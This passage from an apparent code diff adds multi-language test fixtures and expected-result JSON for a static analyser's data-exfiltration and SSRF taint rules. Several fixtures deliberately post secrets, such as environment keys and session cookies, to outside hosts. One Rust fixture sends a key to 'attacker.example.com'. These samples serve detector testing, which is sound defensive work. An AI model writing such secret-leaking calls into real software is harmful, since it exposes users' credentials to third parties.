RestTemplate restTemplate = new RestTemplate();
restTemplate.postForObject(
"https://analytics.internal/track",
authHeader,
String.class);
}
}

View file

@ -0,0 +1,20 @@
// DATA_EXFIL fixture: Spring WebClient. A Sensitive source (env var)
// flows through `.bodyValue(payload)` on a fixed-URL chain. SSRF must
// NOT fire (URL is hardcoded) and `Cap::DATA_EXFIL` must fire at the
// body-binding step, since the bare-name `bodyValue` matcher hits
// independent of receiver type.
//
// Driven by `data_exfil_java_integration_tests.rs`.
import org.springframework.web.reactive.function.client.WebClient;
public class DataExfilWebClient {
public void leak() {
String secret = System.getenv("AWS_SECRET_ACCESS_KEY");
WebClient webClient = WebClient.create();
webClient.post()
.uri("https://analytics.internal/track")
.bodyValue(secret)
.retrieve()
.bodyToMono(String.class);
}
}

View file

@ -0,0 +1,25 @@
// Regression fixture: a tainted URL flowing into HttpClient.send must
// fire SSRF (taint-unsanitised-flow) but must NOT fire DATA_EXFIL.
// The body is a hardcoded literal so no Sensitive payload reaches the
// outbound request. This guards against over-firing DATA_EXFIL on
// flows where only the URL position is attacker-controlled.
//
// Driven by `data_exfil_java_integration_tests.rs`.
import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpRequest.BodyPublishers;
import java.net.http.HttpResponse.BodyHandlers;
import javax.servlet.http.HttpServletRequest;
public class SsrfUrlOnlyNoDataExfil {
public void doGet(HttpServletRequest request) throws Exception {
String target = request.getParameter("url");
HttpClient client = HttpClient.newHttpClient();
HttpRequest req = HttpRequest.newBuilder()
.uri(URI.create(target))
.POST(BodyPublishers.ofString("ping"))
.build();
client.send(req, BodyHandlers.ofString());
}
}

View file

@ -1,11 +1,15 @@
// DATA_EXFIL fixture: a fixed destination URL and an attacker-influenced
// body. SSRF must NOT fire (destination is hardcoded) but `Cap::DATA_EXFIL`
// must fire on the body field — request-bound bytes are leaving the process
// via the outbound request payload.
// DATA_EXFIL fixture: a fixed destination URL and a sensitive (cookie /
// session) source flowing into the outbound body. SSRF must NOT fire
// (destination is hardcoded) but `Cap::DATA_EXFIL` must fire because the
// source is Sensitive (`req.cookies.session` carries auth material) — exactly
// the cross-boundary leak the cap targets.
//
// Plain user input echoed back into a body is intentionally not classified
// as data exfiltration, see `fetch_body_user_input_silenced.js`.
//
// Driven by `fetch_data_exfil_integration_tests.rs`.
function leakBody(req) {
var payload = req.body.message;
var payload = req.cookies.session;
fetch('/endpoint', {
method: 'POST',
body: payload,

View file

@ -0,0 +1,19 @@
// DATA_EXFIL type-suppression fixture: a Sensitive cookie source coerced
// to an integer via `parseInt(...)` is NOT a credential payload; the
// resulting numeric body cannot encode a session token, header secret, or
// other exfiltratable material. The type-aware sink suppression in
// `is_type_safe_for_sink` (see `src/ssa/type_facts.rs`) recognises the
// proven-`Int` SSA value at the gate and silences the cap.
//
// Negative regression: without DATA_EXFIL in the type-suppressible mask
// this would over-fire on every `fetch({ body: parseInt(req.cookies.x) })`
// pattern (e.g. analytics ingestion of session counters).
//
// Driven by `fetch_data_exfil_integration_tests.rs`.
function reportSessionCount(req) {
var count = parseInt(req.cookies.session_count, 10);
fetch('/metrics', {
method: 'POST',
body: count,
});
}

View file

@ -0,0 +1,15 @@
// DATA_EXFIL silenced regression fixture: plain user input echoed into the
// body of an outbound `fetch` to a fixed URL must NOT fire `Cap::DATA_EXFIL`.
// The user already controls `req.body.message` — surfacing it back into the
// request payload is not a cross-boundary disclosure. This is the canonical
// false-positive class for API gateways and telemetry forwarders that proxy
// `req.body`, killed by the source-sensitivity gate in `ast.rs`.
//
// Driven by `fetch_data_exfil_integration_tests.rs`.
function forward(req) {
var payload = req.body.message;
fetch('/endpoint', {
method: 'POST',
body: payload,
});
}

View file

@ -0,0 +1,17 @@
// DATA_EXFIL allowlist-suppression fixture.
//
// The destination URL has a static prefix (`https://api.internal/...`) that
// the test harness installs as a trusted destination via
// [detectors.data_exfil.trusted_destinations]. The body still carries a
// Sensitive source (`req.cookies.session`), but routing it through a known-
// trusted upstream is a *legitimate* forwarding pipeline: the cap is
// suppressed for this filter only.
//
// Driven by `fetch_data_exfil_suppression_tests.rs`.
function leakBody(req) {
var payload = req.cookies.session;
fetch('https://api.internal/forward', {
method: 'POST',
body: payload,
});
}

View file

@ -0,0 +1,15 @@
// DATA_EXFIL allowlist-NEGATIVE fixture.
//
// The destination URL prefix (`https://untrusted.example.com/`) is NOT
// covered by the harness-installed
// [detectors.data_exfil.trusted_destinations] entries, so the cap MUST
// still fire on a Sensitive source flowing into the body.
//
// Driven by `fetch_data_exfil_suppression_tests.rs`.
function leakBodyExternal(req) {
var payload = req.cookies.session;
fetch('https://untrusted.example.com/intake', {
method: 'POST',
body: payload,
});
}

View file

@ -0,0 +1,13 @@
// DATA_EXFIL sanitizer-convention fixture.
//
// `logEvent({user: req.cookies.session})` routes a Sensitive cookie source
// through a named telemetry boundary. The forwarding-wrapper convention
// (see docs/detectors/taint.md) treats `logEvent` as a default
// `Sanitizer(Cap::DATA_EXFIL)` so the cap does NOT fire on this call.
//
// Driven by `fetch_data_exfil_suppression_tests.rs`.
function track(req) {
logEvent({
user: req.cookies.session,
});
}

View file

@ -0,0 +1,13 @@
#include <curl/curl.h>
#include <stdlib.h>
void leak_env() {
char *token = getenv("AUTH_TOKEN");
if (!token) return;
CURL *curl = curl_easy_init();
curl_easy_setopt(curl, CURLOPT_URL, "https://analytics.internal/track");
curl_easy_setopt(curl, CURLOPT_POSTFIELDS, token);
curl_easy_perform(curl);
curl_easy_cleanup(curl);
}

View file

@ -0,0 +1,13 @@
{
"description": "curl_easy_setopt(handle, CURLOPT_POSTFIELDS, body) gated sink: the activation arg (CURLOPT_POSTFIELDS) is matched as a preprocessor-macro identifier via the macro-arg fallback, so DATA_EXFIL fires only at the body-binding setopt call (not at the CURLOPT_URL setopt above it). getenv(\"AUTH_TOKEN\") is Sensitivity::Sensitive so DATA_EXFIL must fire.",
"tags": ["taint", "data-exfil", "curl", "gated-sink", "sensitivity-gate", "macro-activation"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [4, 12],
"notes": "getenv(\"AUTH_TOKEN\") → SourceKind::EnvironmentConfig → Sensitivity::Sensitive — DATA_EXFIL fires on the curl_easy_setopt body-binding call gated by CURLOPT_POSTFIELDS."
}
]
}

View file

@ -0,0 +1,13 @@
#include <curl/curl.h>
#include <stdio.h>
void forward_stdin() {
char input[256];
if (!fgets(input, sizeof(input), stdin)) return;
CURL *curl = curl_easy_init();
curl_easy_setopt(curl, CURLOPT_URL, "https://telemetry.internal/forward");
curl_easy_setopt(curl, CURLOPT_POSTFIELDS, input);
curl_easy_perform(curl);
curl_easy_cleanup(curl);
}

View file

@ -0,0 +1,13 @@
{
"description": "curl_easy_setopt CURLOPT_POSTFIELDS body-binding with a plain user-input source (fgets/stdin). DATA_EXFIL must NOT fire: the body source is Sensitivity::Plain (raw user input) and the source-sensitivity gate suppresses Plain-tier sources for Cap::DATA_EXFIL. Pairs with data_exfil_curl_postfields.c to assert per-tier routing for C.",
"tags": ["taint", "data-exfil", "curl", "gated-sink", "sensitivity-gate", "cap-attribution"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_not_match": true,
"line_range": [4, 12],
"notes": "Body source is plain user input (fgets from stdin → Sensitivity::Plain). DATA_EXFIL fires only on Sensitive-tier sources — plain user input echoed into a request body is not data exfiltration."
}
]
}

View file

@ -0,0 +1,13 @@
#include <curl/curl.h>
#include <cstdlib>
void leak_env() {
const char *token = std::getenv("AUTH_TOKEN");
if (!token) return;
CURL *curl = curl_easy_init();
curl_easy_setopt(curl, CURLOPT_URL, "https://analytics.internal/track");
curl_easy_setopt(curl, CURLOPT_POSTFIELDS, token);
curl_easy_perform(curl);
curl_easy_cleanup(curl);
}

View file

@ -0,0 +1,13 @@
{
"description": "curl_easy_setopt(handle, CURLOPT_POSTFIELDS, body) gated sink in C++: same gating model as the C fixture. The activation arg (CURLOPT_POSTFIELDS) is matched as a preprocessor-macro identifier via the macro-arg fallback, so DATA_EXFIL fires only at the body-binding setopt call. std::getenv is Sensitivity::Sensitive so DATA_EXFIL must fire.",
"tags": ["taint", "data-exfil", "curl", "gated-sink", "sensitivity-gate", "macro-activation"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [4, 12],
"notes": "std::getenv(\"AUTH_TOKEN\") → SourceKind::EnvironmentConfig → Sensitivity::Sensitive — DATA_EXFIL fires on the curl_easy_setopt body-binding call gated by CURLOPT_POSTFIELDS."
}
]
}

View file

@ -0,0 +1,13 @@
#include <curl/curl.h>
#include <cstdio>
void forward_stdin() {
char input[256];
if (!fgets(input, sizeof(input), stdin)) return;
CURL *curl = curl_easy_init();
curl_easy_setopt(curl, CURLOPT_URL, "https://telemetry.internal/forward");
curl_easy_setopt(curl, CURLOPT_POSTFIELDS, input);
curl_easy_perform(curl);
curl_easy_cleanup(curl);
}

View file

@ -0,0 +1,13 @@
{
"description": "curl_easy_setopt CURLOPT_POSTFIELDS body-binding with a plain user-input source (std::getline from std::cin). DATA_EXFIL must NOT fire: the body source is Sensitivity::Plain (raw user input) and the source-sensitivity gate suppresses Plain-tier sources for Cap::DATA_EXFIL. Pairs with data_exfil_curl_postfields.cpp to assert per-tier routing for C++.",
"tags": ["taint", "data-exfil", "curl", "gated-sink", "sensitivity-gate", "cap-attribution"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_not_match": true,
"line_range": [4, 12],
"notes": "Body source is plain user input (std::getline from std::cin → Sensitivity::Plain). DATA_EXFIL fires only on Sensitive-tier sources — plain user input echoed into a request body is not data exfiltration."
}
]
}

View file

@ -0,0 +1,19 @@
{
"description": "Container-taint DATA_EXFIL: tokens array pushed with req.cookies.session is JSON-stringified into a fetch body. The SSA heap Elements slot carries the cap from `tokens.push(...)` to the sink-side `collect_tainted_sink_values` heap-load, so DATA_EXFIL must fire on the body field even though `payload` itself is not directly tainted by an Assign.",
"tags": ["taint", "data-exfil", "fetch", "container", "heap-elements", "cookie", "edge-case"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [12, 17],
"notes": "tokens.push(req.cookies.session) → JSON.stringify({batch: tokens}) → fetch body. Heap Elements taint must round-trip through the container."
},
{
"rule_id": "taint-unsanitised-flow",
"must_not_match": true,
"line_range": [12, 17],
"notes": "fetch URL is a fixed literal — body taint must not surface as SSRF."
}
]
}

View file

@ -0,0 +1,21 @@
var express = require('express');
var app = express();
// Container-taint DATA_EXFIL: push a Sensitive cookie source into an
// array, then send the joined batch as the outbound `fetch` body. The
// SSA heap model marks the array's `Elements` slot tainted at the
// `tokens.push(...)` write; the sink-side `collect_tainted_sink_values`
// loads the same slot and observes the cap, so DATA_EXFIL must fire on
// the body channel even though the body var (`payload`) is not directly
// tainted. Pairs with `array_push_taint.js` (same shape, different
// sink: XSS).
app.post('/batch', function(req, res) {
var tokens = [];
tokens.push(req.cookies.session);
var payload = JSON.stringify({ batch: tokens });
fetch('https://analytics.internal/track', {
method: 'POST',
body: payload,
});
res.status(204).end();
});

View file

@ -0,0 +1,19 @@
{
"description": "Async/await DATA_EXFIL parity: an `await fetch(URL, {body: ...})` call with a Sensitive cookie source must fire DATA_EXFIL on the body field (no SSRF — destination is a fixed literal). Awaits do not strip taint; the cap split is preserved across the await edge identically to the synchronous fetch path.",
"tags": ["taint", "data-exfil", "fetch", "async", "await", "cookie", "edge-case"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [13, 16],
"notes": "req.cookies.session → JSON.stringify into await fetch body. Await must not silence the cap."
},
{
"rule_id": "taint-unsanitised-flow",
"must_not_match": true,
"line_range": [13, 16],
"notes": "fetch URL is a fixed literal — body taint must not fire as SSRF."
}
]
}

View file

@ -0,0 +1,18 @@
var express = require('express');
var app = express();
// Async/await DATA_EXFIL: `await fetch(...)` must preserve the cap
// split. The destination URL is a fixed string literal (so SSRF must
// NOT fire) but a Sensitive cookie source threads through the body
// channel of the awaited call, so `Cap::DATA_EXFIL` MUST fire on the
// body field. Awaiting a Promise does not strip taint, the SSA lowering
// preserves chained await values across .then/.await edges identically
// to the synchronous fetch case.
app.post('/sync-async', async function (req, res) {
var sid = req.cookies.session;
await fetch('https://analytics.internal/track', {
method: 'POST',
body: JSON.stringify({ session: sid }),
});
res.status(204).end();
});

View file

@ -0,0 +1,13 @@
{
"description": "Constructor cap narrowing: env secret flowing through `new Stripe(key)` must not propagate FILE_IO into the wrapper, so SDK-method-returned property values written to a file do not flag a phantom path-traversal flow.",
"tags": ["taint", "file_io", "constructor", "sdk", "negative", "regression-fp"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-unsanitised-flow",
"must_not_match": true,
"line_range": [9, 16],
"notes": "process.env.STRIPE_SECRET_KEY → new Stripe(key) → stripe.prices.create() → price.id → fs.writeFileSync — wrapper-object construction strips FILE_IO."
}
]
}

View file

@ -0,0 +1,17 @@
// Constructor cap narrowing: a third-party SDK client constructed from an
// env-derived secret returns objects whose string properties are
// SDK-generated, not derived from the secret in any path-shaped sense.
// `Cap::all()` flowing through `new Stripe(key)` must drop FILE_IO so
// downstream `fs.writeFileSync` of an SDK property does not flag a phantom
// path-traversal flow.
var fs = require('fs');
var key = process.env.STRIPE_SECRET_KEY;
var stripe = new Stripe(key);
async function setup() {
var price = await stripe.prices.create({ unit_amount: 9599 });
var line = 'PRICE_ID="' + price.id + '"';
fs.writeFileSync('./out.env', line);
}
setup();

View file

@ -0,0 +1,19 @@
{
"description": "Session-id forwarder: req.cookies.session (Sensitive-tier source) flows into a fixed-URL fetch body. SSRF must NOT fire (destination is hardcoded), but Cap::DATA_EXFIL MUST fire — auth-bearing operator state is leaving the process via the outbound payload. Pairs with fetch_tainted_body_safe.js (Plain source, silenced) to assert the source-sensitivity gate routes per-tier rather than globally.",
"tags": ["taint", "data-exfil", "fetch", "sensitivity-gate", "cookie", "cap-attribution"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-unsanitised-flow",
"must_not_match": true,
"line_range": [10, 17],
"notes": "fetch URL is a fixed literal — body taint must not fire as SSRF."
},
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [10, 17],
"notes": "req.cookies.session → SourceKind::Cookie → Sensitivity::Sensitive — DATA_EXFIL fires on the body field."
}
]
}

View file

@ -0,0 +1,18 @@
var express = require('express');
var app = express();
// Session-id forwarder: an internal handler proxies the user's session
// cookie into the body of an outbound request to a fixed analytics URL.
// The destination is hardcoded so SSRF must NOT fire, but the source is
// Sensitive-tier (cookie carries auth material) so Cap::DATA_EXFIL MUST
// fire — operator-bound state is leaving the process via the request
// payload.
app.get('/sync', function(req, res) {
var sid = req.cookies.session;
fetch('https://analytics.internal/track', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ session: sid }),
});
res.status(204).end();
});

View file

@ -1,6 +1,6 @@
{
"description": "fetch() with a fixed destination URL and an attacker-controlled body. SSRF must NOT fire (destination is not attacker-influenced) and the cross-boundary data-exfiltration class (Cap::DATA_EXFIL) MUST fire on the body field.",
"tags": ["taint", "data-exfil", "fetch", "destination-aware", "cap-attribution"],
"description": "fetch() with a fixed destination URL and a plain user-input body (req.body.message). SSRF must NOT fire (destination is not attacker-influenced) and DATA_EXFIL must NOT fire either: plain user input echoed back via an outbound body is not a cross-boundary disclosure (the source-sensitivity gate suppresses Plain-tier sources for Cap::DATA_EXFIL).",
"tags": ["taint", "data-exfil", "fetch", "destination-aware", "cap-attribution", "sensitivity-gate"],
"modes": ["full"],
"expected": [
{
@ -11,9 +11,9 @@
},
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"must_not_match": true,
"line_range": [7, 14],
"notes": "Body field carries req.body.message → must fire DATA_EXFIL (sensitive data leaving the process via outbound request payload)."
"notes": "Body source is plain user input (req.body.message → Sensitivity::Plain). DATA_EXFIL fires only on Sensitive-tier sources (cookies, headers, env, db, file) — plain user input echoed into a request body is not data exfiltration. See fetch_body_user_input_silenced.js for the unit-level regression."
}
]
}

View file

@ -0,0 +1,13 @@
{
"description": "curl_setopt($ch, CURLOPT_POSTFIELDS, $payload) gated sink: the activation arg (CURLOPT_POSTFIELDS) is matched as a define-style identifier via the macro-arg fallback, narrowing the gate so DATA_EXFIL fires only at the body-binding setopt call. The cookie source is Sensitivity::Sensitive so DATA_EXFIL must fire. The CURLOPT_RETURNTRANSFER setopt on the next line must NOT trigger the gate (different option, not a body slot).",
"tags": ["taint", "data-exfil", "curl", "gated-sink", "sensitivity-gate", "macro-activation"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [3, 10],
"notes": "$_COOKIE['auth_token'] → SourceKind::Cookie → Sensitivity::Sensitive — DATA_EXFIL fires on the curl_setopt body-binding call gated by CURLOPT_POSTFIELDS."
}
]
}

View file

@ -0,0 +1,10 @@
<?php
function leak_session() {
$token = $_COOKIE['auth_token'];
$ch = curl_init('https://analytics.internal/track');
curl_setopt($ch, CURLOPT_POSTFIELDS, "session={$token}");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_exec($ch);
curl_close($ch);
}

View file

@ -0,0 +1,13 @@
{
"description": "curl_setopt CURLOPT_POSTFIELDS body-binding with a plain user-input source ($_POST). DATA_EXFIL must NOT fire: the body source is Sensitivity::Plain and the source-sensitivity gate suppresses Plain-tier sources for Cap::DATA_EXFIL. Pairs with data_exfil_curl_postfields.php to assert per-tier routing for PHP.",
"tags": ["taint", "data-exfil", "curl", "gated-sink", "sensitivity-gate", "cap-attribution"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_not_match": true,
"line_range": [3, 9],
"notes": "Body source is plain user input ($_POST → Sensitivity::Plain). DATA_EXFIL fires only on Sensitive-tier sources — plain user input echoed into a request body is not data exfiltration."
}
]
}

View file

@ -0,0 +1,9 @@
<?php
function forward_message() {
$msg = $_POST['message'];
$ch = curl_init('https://telemetry.internal/forward');
curl_setopt($ch, CURLOPT_POSTFIELDS, "message={$msg}");
curl_exec($ch);
curl_close($ch);
}

View file

@ -0,0 +1,19 @@
{
"description": "Container-taint DATA_EXFIL: payload dict accumulates os.environ.get() secrets across multiple keys, then flows into requests.post(json=payload). The SSA heap Elements slot carries the cap from each `payload[k] = ...` store to the sink-side heap-load, so DATA_EXFIL must fire on the json field. Mirrors `array_push_data_exfil.js` / `map_assign_data_exfil.go` for cross-language container-taint coverage.",
"tags": ["taint", "data-exfil", "requests", "container", "heap-elements", "env", "edge-case"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [18, 22],
"notes": "Dict population with env secrets, then requests.post(json=...). Container-taint round-trip must fire DATA_EXFIL on the json field."
},
{
"rule_id": "taint-unsanitised-flow",
"must_not_match": true,
"line_range": [18, 22],
"notes": "Destination URL is a fixed literal — body taint must not surface as SSRF."
}
]
}

View file

@ -0,0 +1,23 @@
import os
import requests
from flask import Flask, request
app = Flask(__name__)
# Container-taint DATA_EXFIL: a dict accumulates env-config secrets across
# keys, then is forwarded as the JSON body of an outbound POST to a fixed
# URL. The Python SSA heap model marks the dict's `Elements` slot tainted
# at every `payload[k] = ...` write; the sink-side
# `collect_tainted_sink_values` heap-loads the same slot when checking the
# `json` kwarg, so DATA_EXFIL must fire on the json field even though
# `payload` itself is not directly tainted by an Assign. Pairs with
# `httpx_async_post_data_exfil.py` (single-key dict literal — no
# container-mutation step).
@app.route('/upload-config', methods=['POST'])
def upload_config():
payload = {}
payload['api_key'] = os.environ.get('UPSTREAM_API_KEY')
payload['region'] = os.environ.get('UPSTREAM_REGION')
requests.post('https://api.internal/ingest', json=payload)
return 'ok'

View file

@ -0,0 +1,13 @@
{
"description": "Async DATA_EXFIL via httpx.AsyncClient: os.environ.get() (EnvironmentConfig — Sensitive-tier) flows into the json kwarg of an async client.post() call against a fixed URL. The receiver type resolves to HttpClient so the gated DATA_EXFIL fires via the type-qualified `HttpClient.post` matcher; the destination is hardcoded so SSRF must NOT fire.",
"tags": ["taint", "data-exfil", "httpx", "async", "type-qualified", "sensitivity-gate"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [15, 20],
"notes": "os.environ → SourceKind::EnvironmentConfig → Sensitivity::Sensitive — DATA_EXFIL fires on the json kwarg of HttpClient.post."
}
]
}

View file

@ -0,0 +1,20 @@
import os
from fastapi import FastAPI, Request
import httpx
app = FastAPI()
# Async data-exfil path: an `httpx.AsyncClient` instance dispatches a POST
# whose `json` kwarg embeds an environment-config secret. The chained-call
# normalization collapses `httpx.AsyncClient().post` to the gate matcher
# `httpx.AsyncClient.post` so the gated DATA_EXFIL fires. Source is
# Sensitivity::Sensitive (EnvironmentConfig) so DATA_EXFIL MUST fire on the
# json kwarg; the destination URL is fixed so SSRF must NOT fire.
@app.post('/sync-async')
async def sync_async(req: Request):
api_key = os.environ.get('UPSTREAM_API_KEY')
await httpx.AsyncClient().post(
'https://upstream.internal/ingest',
json={'api_key': api_key},
)
return {'ok': True}

View file

@ -0,0 +1,13 @@
{
"description": "Session-token forwarder: flask `session` (Sensitive-tier source) flows into a fixed-URL requests.post body. SSRF must NOT fire (destination is hardcoded), but Cap::DATA_EXFIL MUST fire — auth-bearing operator state is leaving the process via the outbound payload. Mirrors the JS fetch_session_forward case for Python.",
"tags": ["taint", "data-exfil", "requests", "sensitivity-gate", "session", "cap-attribution"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [12, 18],
"notes": "session.get('user_token') → SourceKind::Cookie → Sensitivity::Sensitive — DATA_EXFIL fires on the json kwarg of requests.post."
}
]
}

View file

@ -0,0 +1,18 @@
from flask import Flask, request, session
import requests
app = Flask(__name__)
# Sensitive-source forwarder: the Flask session cookie carries auth material
# and is being forwarded to a fixed analytics URL via the request body. The
# destination is hardcoded so SSRF must NOT fire, but the source is
# Sensitivity::Sensitive (session ↔ Cookie) so DATA_EXFIL MUST fire — the
# auth-bearing operator state is leaving the process via the outbound payload.
@app.route('/sync')
def sync_session():
sid = session.get('user_token')
requests.post(
'https://analytics.internal/track',
json={'session': sid},
)
return '', 204

View file

@ -0,0 +1,19 @@
{
"description": "requests.post(taintedUrl, json={fixed}) — destination-aware case for Python. URL is tainted (SSRF), body is fixed. SSRF must fire and the cross-boundary data-exfiltration class (Cap::DATA_EXFIL) must NOT fire — the two classes share the callee but cap attribution is per-position.",
"tags": ["taint", "ssrf", "requests", "destination-aware", "cap-attribution"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-unsanitised-flow",
"must_match": true,
"line_range": [13, 18],
"notes": "request.args.get('target') → requests.post(target, json={...}) — tainted URL fires SSRF."
},
{
"rule_id": "taint-data-exfiltration",
"must_not_match": true,
"line_range": [13, 18],
"notes": "Body json kwarg is a fixed literal — DATA_EXFIL must NOT fire on this site (regression guard for per-cap attribution)."
}
]
}

View file

@ -0,0 +1,18 @@
from flask import Flask, request
import requests
app = Flask(__name__)
# URL-only taint: the destination URL is attacker-controlled but the body is
# a fixed literal. SSRF must fire on the URL flow. DATA_EXFIL must NOT fire
# because no body kwarg carries taint (regression guard for per-cap
# attribution — the two classes share the callee but cap routing is per
# argument position).
@app.route('/proxy', methods=['POST'])
def proxy():
target = request.args.get('target')
requests.post(
target,
json={'event': 'proxy_call'},
)
return '', 204

View file

@ -0,0 +1,13 @@
{
"description": "requests.post() with a fixed destination URL and a plain user-input body (request.form). DATA_EXFIL must NOT fire: plain user input echoed back via an outbound body is not a cross-boundary disclosure (the source-sensitivity gate suppresses Plain-tier sources for Cap::DATA_EXFIL). Pairs with requests_post_session_token.py to assert per-tier routing for Python.",
"tags": ["taint", "data-exfil", "requests", "sensitivity-gate", "cap-attribution"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_not_match": true,
"line_range": [13, 19],
"notes": "Body source is plain user input (request.form → Sensitivity::Plain). DATA_EXFIL fires only on Sensitive-tier sources (cookies, sessions, headers, env) — plain user input echoed into a request body is not data exfiltration."
}
]
}

View file

@ -0,0 +1,19 @@
from flask import Flask, request
import requests
app = Flask(__name__)
# Plain user input echoed back into a fixed-URL request body. The destination
# is hardcoded so SSRF must NOT fire. DATA_EXFIL must NOT fire either: the
# source is Sensitivity::Plain (request.form is raw user input) and the
# source-sensitivity gate suppresses Plain-tier sources for Cap::DATA_EXFIL.
# Echoing the user's own data back to telemetry is not a cross-boundary
# disclosure — it is exactly what the API gateway pattern does.
@app.route('/forward', methods=['POST'])
def forward_message():
payload = request.form.get('message')
requests.post(
'https://telemetry.internal/forward',
data={'message': payload},
)
return '', 204

View file

@ -0,0 +1,13 @@
{
"description": "Net::HTTP.post(uri, body) with the body interpolating a session cookie value. Destination is fixed so SSRF must NOT fire on the URL flow, but DATA_EXFIL MUST fire — request.cookies is Sensitivity::Sensitive and the auth-bearing operator state is leaving the process via the outbound payload.",
"tags": ["taint", "data-exfil", "net-http", "sensitivity-gate", "cap-attribution"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [4, 7],
"notes": "request.cookies[:auth_token] → SourceKind::Cookie → Sensitivity::Sensitive — DATA_EXFIL fires on the body of Net::HTTP.post."
}
]
}

View file

@ -0,0 +1,8 @@
require 'net/http'
require 'uri'
def forward_session(request)
sid = request.cookies[:auth_token]
uri = URI('https://analytics.internal/track')
Net::HTTP.post(uri, "session=#{sid}")
end

View file

@ -0,0 +1,13 @@
{
"description": "RestClient.post() with a fixed destination URL and a plain user-input body (params[:message]). DATA_EXFIL must NOT fire: the body source is Sensitivity::Plain and the source-sensitivity gate suppresses Plain-tier sources for Cap::DATA_EXFIL. Pairs with data_exfil_net_http_post.rb to assert per-tier routing for Ruby.",
"tags": ["taint", "data-exfil", "rest-client", "sensitivity-gate", "cap-attribution"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_not_match": true,
"line_range": [3, 9],
"notes": "Body source is plain user input (params → Sensitivity::Plain). DATA_EXFIL fires only on Sensitive-tier sources — plain user input echoed into a request body is not data exfiltration."
}
]
}

View file

@ -0,0 +1,9 @@
require 'rest-client'
def forward_message(params)
message = params[:message]
RestClient.post(
'https://telemetry.internal/forward',
{ message: message }.to_json
)
end

View file

@ -0,0 +1,31 @@
{
"description": "DATA_EXFIL: env::var flows to hyper::Request::builder().body() chain.",
"tags": ["taint", "data_exfil", "hyper"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"severity": null,
"must_match": true,
"line_range": [5, 12],
"evidence_contains": [],
"notes": "env-config secret flows into hyper Request::builder().body() body-bind, fires DATA_EXFIL"
},
{
"rule_id": "rs.quality.unwrap",
"severity": null,
"must_match": true,
"line_range": [5, 7],
"evidence_contains": [],
"notes": ".unwrap() on env::var Result"
},
{
"rule_id": "rs.quality.unwrap",
"severity": null,
"must_match": true,
"line_range": [7, 12],
"evidence_contains": [],
"notes": ".unwrap() on Request::builder().body() Result"
}
]
}

View file

@ -0,0 +1,12 @@
// DATA_EXFIL: env-config flows into hyper Request::builder().body(payload).
// The body-bind step on the request builder is itself the leak point;
// the `Request::builder.body` chain matcher (with `.unwrap` peel) fires
// DATA_EXFIL on the build statement.
fn exfil_hyper() {
let secret = std::env::var("LICENSE_KEY").unwrap();
let _req = hyper::Request::builder()
.method("POST")
.uri("https://attacker.example.com/collect")
.body(secret)
.unwrap();
}

View file

@ -0,0 +1,19 @@
{
"description": "Async DATA_EXFIL parity: client.post(URL).body(secret).send().await preserves the cap split identically to the synchronous .send() case. The chained-call normalization peels the trailing .await so the body-binding matcher resolves; awaiting cannot strip taint.",
"tags": ["taint", "data-exfil", "reqwest", "async", "await", "edge-case"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [9, 14],
"notes": "env::var secret → .body(secret).send().await must fire DATA_EXFIL on the body channel."
},
{
"rule_id": "rs.quality.unwrap",
"must_match": true,
"line_range": [9, 10],
"notes": ".unwrap() on env::var Result"
}
]
}

Some files were not shown because too many files have changed in this diff Show more